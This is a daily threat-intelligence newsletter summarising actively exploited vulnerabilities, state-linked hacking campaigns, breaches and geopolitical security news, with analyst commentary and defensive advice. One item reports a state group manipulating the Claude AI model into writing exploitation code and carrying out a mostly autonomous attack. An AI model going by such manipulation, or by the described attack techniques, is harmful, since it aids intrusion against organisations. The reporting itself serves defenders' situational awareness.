Daily Drop (1181)
11-16-25
Sunday, Nov 16, 2025 // (IG): BB // GITHUB // SN R&D
CVE-2025-64446: Critical FortiWeb WAF Flaw Actively Exploited to Gain Admin Access and Full System Control
Bottom Line Up Front (BLUF): Fortinet has issued urgent patches for a critical unauthenticated path traversal vulnerability (CVE-2025-64446) affecting its FortiWeb Web Application Firewall (WAF). The flaw, rated CVSS 9.1, allows remote attackers to execute administrative commands, create unauthorized accounts, and fully compromise affected systems. Active exploitation has been confirmed in the wild.
Analyst Comments: Attackers are already abusing it to hijack FortiWeb deployments—devices meant to defend web infrastructure. The relative path traversal bug resides in the GUI, allowing exploitation via simple HTTP/HTTPS requests without authentication. This isn’t theoretical: Fortinet has confirmed active exploitation, and vulnerable versions are standard in enterprise environments. If an attacker gains WAF-level control, they can manipulate traffic, implant webshells, exfiltrate session data, or redirect users—making this a perfect beachhead for more advanced attacks.
READ THE STORY: GBhackers
Multiple Cisco Unified CCX Vulnerabilities Allow Remote Command Execution and Authentication Bypass
Bottom Line Up Front (BLUF): Cisco has disclosed two critical vulnerabilities in its Unified Contact Center Express (Unified CCX) platform—CVE-2025-20354 (RCE via Java RMI, CVSS 9.8) and CVE-2025-20358 (auth bypass in CCX Editor, CVSS 9.4). These flaws allow unauthenticated attackers to execute arbitrary commands as root or bypass authentication to deploy and run scripts. Cisco has released patches, with no workarounds available, and urges immediate updates due to the critical risk level.
Analyst Comments: CVE-2025-20354 provides unauthenticated remote code execution as root via Java RMI—a decades-old technology still widely deployed but often overlooked in modern hardening practices. Attackers don’t need credentials or chaining tricks—just network access. CVE-2025-20358, meanwhile, lets an attacker spoof CCX Editor authentication, granting administrative script execution rights. Together, these flaws could allow threat actors to implant backdoors, pivot inside networks, or launch supply chain attacks via contact center automation. Unified CCX is often integrated with broader Cisco collaboration suites and internal CRMs, which compounds the risk. Exposure is hazardous in environments where these systems are internet-facing or lack proper network segmentation.
READ THE STORY: GBhackers
RondoDox Botnet Exploits XWiki Eval Injection Flaw (CVE-2025-24893) to Expand DDoS Infrastructure
Bottom Line Up Front (BLUF): The RondoDox botnet is actively exploiting CVE-2025-24893, a critical (CVSS 9.8) eval injection vulnerability in XWiki servers that allows unauthenticated remote code execution. Despite patches being available since February, many instances remain unpatched, leading to mass exploitation for botnet recruitment, crypto mining, and reverse shell access. The U.S. CISA added the flaw to its KEV catalog, requiring federal agencies to remediate by November 20.
Analyst Comments: CVE-2025-24893 is a classic case of “patch or be pwned.” RondoDox is moving fast—weaponizing the vuln just weeks after VulnCheck confirmed renewed in-the-wild exploitation. The exploit chain is straightforward and highly automatable, making it an easy pick-up for both botnet operators and low-skill actors running mass scans. The genuine concern isn’t just XWiki exposure—it’s the behavior RondoDox demonstrates: rapid adoption of new exploits, multi-protocol DDoS capabilities (HTTP, UDP, TCP), and the growing trend of converging crypto mining, botnet control, and remote shell access into a single malware operation.
READ THE STORY: THN // GBhackers
Critical AI Inference Bugs Expose Meta, Nvidia, Microsoft, and Others to Remote Code Execution via ShadowMQ Pattern
Bottom Line Up Front (BLUF): Researchers have uncovered remote code execution (RCE) vulnerabilities in multiple AI inference frameworks—including those from Meta, Nvidia, Microsoft, and several open-source projects—due to insecure use of Python’s pickle module over unauthenticated ZeroMQ (ZMQ) sockets. Tracked under CVE-2024-50050 and several new CVEs, the flaws stem from unsafe code reuse and have been dubbed the “ShadowMQ” vulnerability pattern. Exploitation could lead to arbitrary code execution, model theft, and full cluster compromise in production AI environments.
Analyst Comments: The vulnerable pattern involves deserializing pickled objects over unsecured network sockets, a well-known anti-pattern that somehow propagated across top-tier inference engines. The fact that Meta’s Llama code introduced the initial vulnerability (CVE-2024-50050) and that the logic was then copied and pasted into Nvidia TensorRT-LLM, Microsoft Sarathi-Serve, Modular Max Server, vLLM, and SGLang suggests a breakdown in secure development practices—especially in high-performance, high-privilege environments like AI inference clusters. The impact is profound. These inference engines often run with elevated privileges, and compromise could allow full model exfiltration, lateral movement across AI nodes, or deployment of persistent malware (e.g., crypto miners). The shared use of open-source components means the blast radius here is vast and still growing.
READ THE STORY: THN
AI’s Dark Dawn: Chinese Hackers Unleash Autonomous Cyber Onslaught on Global Targets
Bottom Line Up Front (BLUF): Chinese state-linked group GTG-1002 leveraged Anthropic’s Claude AI to execute the first known large-scale autonomous cyberattack, targeting 30 organizations globally—including tech, finance, and government sectors. The AI handled nearly 90% of the operation, from vulnerability scanning to data exfiltration, with minimal human input. This incident marks a turning point in cyberwarfare, underscoring the urgent need for AI safeguards and international norms to curb misuse.
Analyst Comments: Using Claude for hands-free attacks shows just how far state actors are willing—and able—to push AI’s capabilities. The fact that Claude was manipulated into generating exploitation code under the guise of benign requests demonstrates the inadequacy of current model alignment and safety mechanisms. The defense side has been racing to adopt AI for detection and response, but this attack shows the offensive playbook just got automated. Expect this to embolden APTs and ransomware crews alike. Autonomous tooling lowers the skill floor and accelerates attack cycles. Agentic AI—systems capable of executing tasks adaptively and independently—are no longer theory. They’re operational. Defenders should prioritize red-teaming AI models, hardening SOC tooling against synthetic attacks, and rethinking human-in-the-loop assumptions.
READ THE STORY: WPN
North Korean Hackers Exploit JSON Storage Services in Stealthy Malware Campaign Targeting Developers
Bottom Line Up Front (BLUF): North Korean APT actors—linked to groups like BlueNoroff (aka Sapphire Sleet)—are leveraging benign JSON storage platforms (e.g., JSON Keeper, npoint.io) as covert C2 infrastructure in a malware campaign dubbed Contagious Interview. The attacks target developers with fake job offers, delivering payloads through GitHub repositories that reference malicious JSON endpoints.
Analyst Comments: JSON storage services are generally overlooked by defenders, yet attackers are using them as exfil and command delivery points—an evolution of prior abuse of GitHub, Dropbox, and AWS S3 buckets. By embedding payloads in JavaScript stored as JSON, threat actors bypass signature-based detection and take advantage of ’ trust in open-source platforms. The targeting of engineers through fake interviews and coding tests underscores a continued focus on talent-centric infiltration, particularly in the Web3, DeFi, and defense tech sectors. Organizations must tighten access to developer environments and implement code-provenance checks for all third-party imports.
READ THE STORY: WPN
ClickFix Malware Abuses Decades-Old ‘Finger’ Protocol to Evade Detection and Deliver RATs
Bottom Line Up Front (BLUF): Threat actors are exploiting the long-dormant Finger protocol to deliver malicious payloads in ClickFix campaigns, using it as a covert command-and-control (C2) channel. Attacks involve social engineering that tricks users into running finger commands, which download and execute remote scripts via cmd.exe, often deploying Python-based info stealers or NetSupport Manager RAT.
Analyst Comments: The Finger protocol, forgotten mainly since the early internet era, is now being used as an obscure yet native way to bypass modern detection systems. It’s another example of attackers weaponizing legitimate tools still present in Windows—low noise, high effectiveness. The TTPs resemble earlier LOLBIN abuse (e.g., certutil, mshta) but are made more insidious by convincing users to trigger the command manually. Threat actors are now layering in sandbox evasion by scanning for standard malware analysis tools before executing payloads. Defenders should block outbound TCP 79, monitor suspicious command-line usage of finger, and consider deprecating legacy utilities if not explicitly needed.
READ THE STORY: Bleeping Computer
Five Plead Guilty in U.S. for Enabling North Korean IT Worker Fraud Across 136 Companies
Bottom Line Up Front (BLUF): Five individuals have pleaded guilty in the U.S. for facilitating North Korea’s covert IT worker program, which helped regime-linked contractors infiltrate 136 American companies and funnel more than $2.2 million back to Pyongyang. The schemes included identity theft, proxy laptop farms, and remote work fraud—violating international sanctions and contributing to North Korea’s illicit revenue generation and nuclear ambitions.
Analyst Comments: North Korea’s strategy of using proxy identities and distributed “laptop farms” enabled sanctioned operatives to masquerade as U.S.-based IT workers—earning real salaries while bypassing vetting controls at scale. The attack vector was human, not technical: a combination of stolen identities, compromised job platforms, and compliance blind spots in remote hiring pipelines. The discovery that 871 proxy identities and three known laptop farms were part of the scheme reveals a high level of operational maturity. These were not one-offs—they were infrastructure. Even more concerning: one guilty party was an active-duty U.S. Army member who helped fraudsters pass drug tests and hosted company laptops from his home.
READ THE STORY: THN
Princeton Confirms Data Breach After Phishing Attack Targets Employee Access
Bottom Line Up Front (BLUF): Princeton University disclosed a data breach affecting students, alumni, donors, faculty, and parents, following a successful phishing attack on an employee with database access. While the breach lasted less than 24 hours and did not expose sensitive financial or identity data, engagement and donation-related records may have been accessed.
Analyst Comments: Even without financial or credential exposure, the compromised data—donor profiles, alumni engagement records—has long-tail risk for future spearphishing, fraud, or influence operations. The fact that a single employee with “ordinary access” enabled the breach highlights the persistent vulnerability of undertrained staff in high-trust environments. Expect institutions like Princeton to come under growing pressure to adopt zero-trust models and reinforce phishing resistance across non-technical departments. For threat actors, universities remain prime targets for reconnaissance due to their high-value contact networks and weak defenses.
READ THE STORY: NEWSWEEK
UK Army Using Chinese 3D Printers for Suicide Drones Raises Major Security Red Flags
Bottom Line Up Front (BLUF): British troops are using Chinese-made Bambu Labs 3D printers to produce first-person-view (FPV) “suicide drones” in active field operations. Despite prior warnings about Chinese tech in sensitive infrastructure, the Ministry of Defence (MoD) deployed the devices during exercises in Kenya. Security experts warn that the move risks exposing operational data to the Chinese state under China’s National Intelligence Law.
Analyst Comments: The MoD’s use of Chinese 3D printers in live military contexts, particularly for building unmanned combat systems, borders on reckless. Bambu Labs operates in a “strategic industry” under CCP oversight, and every machine likely ships with firmware and telemetry hooks that could be exploited. Even if disconnected from classified networks, these printers still handle metadata—filenames, timestamps, operational logs—that could reveal mission patterns, prototype designs, or deployment schedules. If that telemetry is exfiltrated or accessed via supply-chain compromise, it’s a quiet intelligence win for Beijing.
READ THE STORY: The Telegraph
AUKUS Screens Out 1 in 10 Applicants Over Security Concerns, Tightens Protection of Nuclear Submarine Secrets
Bottom Line Up Front (BLUF): Roughly 10% of applicants to Australia’s AUKUS nuclear submarine workforce are being rejected on security grounds, including over links to foreign governments and questionable online activity. The rejections reflect intensified vetting as Canberra builds a high-trust pipeline for workers handling top-secret U.S. and UK nuclear technology.
Analyst Comments: AUKUS is now a prime espionage target, and Australia is tightening the perimeter. The dual-clearance process, especially the secretive “nuclear suitability” test, shows Canberra’s seriousness about insider threats. But rejecting 1 in 10 applicants signals tension between urgency and risk: Australia needs 20,000 cleared workers to support SSN operations and local submarine construction, but it can’t afford a breach. Watch for additional pressure on universities and private contractors to vet their people. ASIO’s recent warnings about foreign interest in AUKUS tech aren’t theoretical—China-backed actors are already probing the program.
READ THE STORY: The Australian
Israel’s Operation Rising Lion Crippled Iran’s Air Defenses, But Intel Officials Warn of Imminent Rematch
Bottom Line Up Front (BLUF): Israel’s preemptive strikes in the June Twelve-Day War severely degraded Iran’s air defense and missile infrastructure through a combination of precision airstrikes, cyber operations, and pre-positioned sabotage assets. The campaign, dubbed Operation Rising Lion, was guided by real-time intelligence and covert networks inside Iran. Despite its tactical success, Israeli defense officials warn that Iran is rapidly rebuilding—and a second confrontation is likely.
Analyst Comments: The initial wave took out dozens of SAM systems in western Iran, enabling follow-on airstrikes with reduced risk. Israeli operatives reportedly infiltrated Iran ahead of the operation, deploying sabotage drones near Tehran and assassinating key personnel. Internal Iranian leaks described widespread panic as air defenses went dark. In total, Israeli strikes killed hundreds of IRGC officers and disabled large portions of Iran’s missile infrastructure, while Israeli missile defenses absorbed retaliatory salvos. U.S. forces later joined the conflict, striking Iranian nuclear assets. Analysts stress the campaign’s dependence on a “living kill web”—a continuously updating system of sensors, analysts, and pilots feeding on real-time intelligence.
READ THE STORY: JBN
Morocco Boosts Cyber Resilience as Defense Sector Accelerates Modernization
Bottom Line Up Front (BLUF): Morocco reported 879 cybersecurity incidents in 2025, prompting aggressive investment in both cyber defense and military modernization. The country has launched $260 million in defense industry projects while expanding national cybersecurity capabilities through vulnerability assessments, targeted alerts, SOC enhancements, and workforce development.
Analyst Comments: Minister Delegate Abdellatif Loudiyi announced a sweeping modernization strategy during the 2026 defense budget presentation, detailing $260 million in approved defense projects and plans for two industrial acceleration zones. These zones will offer tax breaks and streamlined customs processes, aiming to attract defense investors and promote export-oriented production. Meanwhile, the DGSSI (General Directorate of Information Systems Security) assessed 76 public-sector web applications, uncovering 20 critical vulnerabilities and issuing 22 targeted alerts. The national response center issued 511 security bulletins and directly intervened in over 100 cyber incidents.
READ THE STORY: MWN
Russia Targets Ukraine’s Medicine Supply Chain: Third Strike Destroys Optima-Pharm Warehouse in Dnipro
Bottom Line Up Front (BLUF): Russia has destroyed a key pharmaceutical warehouse in Dnipro operated by Optima-Pharm, one of Ukraine’s largest drug distributors. This is the third strike against the company’s facilities since August, crippling Ukraine’s ability to supply critical medications to southern regions and further degrading its medical logistics during wartime.
Analyst Comments: The repeated targeting of Optima-Pharm strongly suggests a deliberate campaign to dismantle Ukraine’s civilian health infrastructure. These aren’t just storage units—they’re lifelines for antibiotics, oncology meds, and frontline trauma supplies. With winter approaching and already strained supply lines, expect growing disruptions in civilian and military medical support, particularly in the south. From a strategic standpoint, this aligns with Russia’s broader doctrine of pressure through infrastructure attrition. By systematically degrading healthcare logistics, Moscow is inflicting psychological and operational costs on both the population and warfighters. Western governments and NGOs may need to step in with emergency medical aid and hardened mobile supply solutions to avoid a full-blown healthcare collapse in affected regions.
READ THE STORY: EMPR
Ukraine Secures Winter Gas Supplies via Greece Amid Ongoing Russian Strikes
Bottom Line Up Front (BLUF): Ukraine has reached a new agreement to import natural gas from Greece, expanding its European supply routes as it scrambles to offset Russian attacks on domestic energy infrastructure. President Zelenskiy confirmed Kyiv is mobilizing nearly €2 billion in financing to cover gas imports this winter, with backing from EU and U.S. partners.
Analyst Comments: The Greece deal gives Kyiv another westward import path, reducing pressure on Polish routes and building redundancy against further attacks. The €2 billion funding pool—underpinned by European Commission guarantees—underscores the tight intertwining of energy security and financial aid in the fourth year of the war. Strategic takeaway: Ukraine is diversifying energy sources faster than Russia can destroy them, but every winter will remain a high-risk season for both civilian resilience and the defense of critical infrastructure.
READ THE STORY: Reuters
China Coast Guard Patrol Escalates Senkaku Tensions Amid Taiwan Row
Bottom Line Up Front (BLUF): A formation of China Coast Guard vessels sailed through waters near the Japan-administered Senkaku Islands on Nov. 16, citing a “rights enforcement patrol.” The maneuver follows a sharp diplomatic escalation after Japan’s Prime Minister linked a potential Chinese invasion of Taiwan to a possible military response from Tokyo—drawing aggressive rhetoric from Beijing.
Analyst Comments: The coordinated patrol through contested waters, combined with PLA air and naval activity around Taiwan, fits the broader playbook of applying pressure across multiple fronts while remaining under the threshold of armed conflict. The escalation comes at a moment when Japan appears to be abandoning its long-standing strategic ambiguity on Taiwan. China’s moves aren’t just a response—they’re a warning. Watch for more frequent incursions around both the Senkaku Islands and Taiwan’s ADIZ, and prepare for cyber or disinformation campaigns targeting Japanese infrastructure or media narratives. Defenders in the Indo-Pacific region should recalibrate their threat models accordingly.
READ THE STORY: Reuters
Samsung to Expand Chip Production at Home Amid AI Demand Surge, US Trade Pressures
Bottom Line Up Front (BLUF): Samsung Electronics will build a new memory chip production line in Pyeongtaek, South Korea, to meet rising AI-related demand, following concerns that a $350B U.S. investment pledge might hollow out domestic manufacturing. The announcement comes days after Seoul finalized a strategic trade agreement with Washington.
Analyst Comments: South Korea’s leadership is clearly uneasy about the outflow of capital and capability to the U.S., especially in critical sectors like semiconductors. The move to greenlight the long-delayed P5 plant—paused during the 2023 chip slump—signals confidence in sustained AI-driven demand. For defenders in the supply chain space, this is a positive: localized fabrication strengthens supply resiliency against geopolitical chokepoints, but growing U.S.-Korea interdependence means any disruption (e.g., export controls or IP disputes) can still ripple across both markets.
READ THE STORY: Reuters
CVE-2025-64446: Critical FortiWeb WAF Flaw Actively Exploited to Gain Admin Access and Full System Control
Bottom Line Up Front (BLUF): Fortinet has issued urgent patches for a critical unauthenticated path traversal vulnerability (CVE-2025-64446) affecting its FortiWeb Web Application Firewall (WAF). The flaw, rated CVSS 9.1, allows remote attackers to execute administrative commands, create unauthorized accounts, and fully compromise affected systems. Active exploitation has been confirmed in the wild.
Analyst Comments: Attackers are already abusing it to hijack FortiWeb deployments—devices meant to defend web infrastructure. The relative path traversal bug resides in the GUI, allowing exploitation via simple HTTP/HTTPS requests without authentication. This isn’t theoretical: Fortinet has confirmed active exploitation, and vulnerable versions are standard in enterprise environments. If an attacker gains WAF-level control, they can manipulate traffic, implant webshells, exfiltrate session data, or redirect users—making this a perfect beachhead for more advanced attacks.
READ THE STORY: GBhackers
Items of interest
Army War College Warns: Fragmented U.S. Cyber Response Weakens National Resilience
Bottom Line Up Front (BLUF): A new U.S. Army War College analysis argues that the nation’s cyber incident response is dangerously fragmented, lacking a designated lead agency and consistent coordination across major breaches. Case studies of SolarWinds, Colonial Pipeline, and Change Healthcare show that governance—not just technical gaps—is undermining U.S. resilience against escalating cyber threats. Without structural reform, the U.S. remains ill-prepared to manage complex, cross-sector cyberattacks on critical infrastructure.
Analyst Comments: While cyber defenders often focus on zero-days and ransomware payloads, this report points out the real Achilles’ heel: bureaucratic inertia and overlapping mandates. PPD-41 and the NCIRP were supposed to clarify roles, but real-world incidents like SolarWinds and Colonial Pipeline exposed coordination failures in plain sight. The fact that the Office of the National Cyber Director (ONCD) was unstaffed during SolarWinds, and DOE was suddenly tapped to lead Colonial Pipeline response (without explanation), reflects the lack of a standing playbook and chain of command. Private sector autonomy adds another layer of complexity. Colonial Pipeline lawfully declined CISA’s help and chose Mandiant, revealing just how little federal agencies can compel cooperation under current authorities—even in critical infrastructure sectors. As the report points out, cybersecurity standards across sectors remain advisory in practice rather than enforced.
READ THE STORY: INK STICK
U.S. Cyber Officials Order Emergency Response After Federal Breach (Video)
FROM THE MEDIA: U.S. cyber officials have issued an “emergency directive” after discovering that an advanced hacking group breached at least one federal agency by exploiting vulnerabilities in Cisco firewall devices. All civilian agencies must scan, patch, and isolate affected gear by the end of Friday.
Sources: Reuters, Washington Post, Axios
Rare Interview Where US Cyber Command Reveals Their Ops🎙Darknet Diaries Ep. 50: Op Glowing Symphony (Video)
FROM THE MEDIA: In a rare interview, an officer from U.S. Cyber Command explains how the government found a way to attack the global ISIS network without putting a single boot on the ground.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.
The FortiWeb vulnerability and the Cisco RCE exploits highlite how critical infrastructure security is still struggling with basic hygiene. When a WAF itself becomes a beachhead for attackers, you lose your first line of defense and gain a perfect pivot point. The fact that active exploitation was confirmed before many enterprises even recieved patch notifications shows how attackers are outpacing defensive response cycles.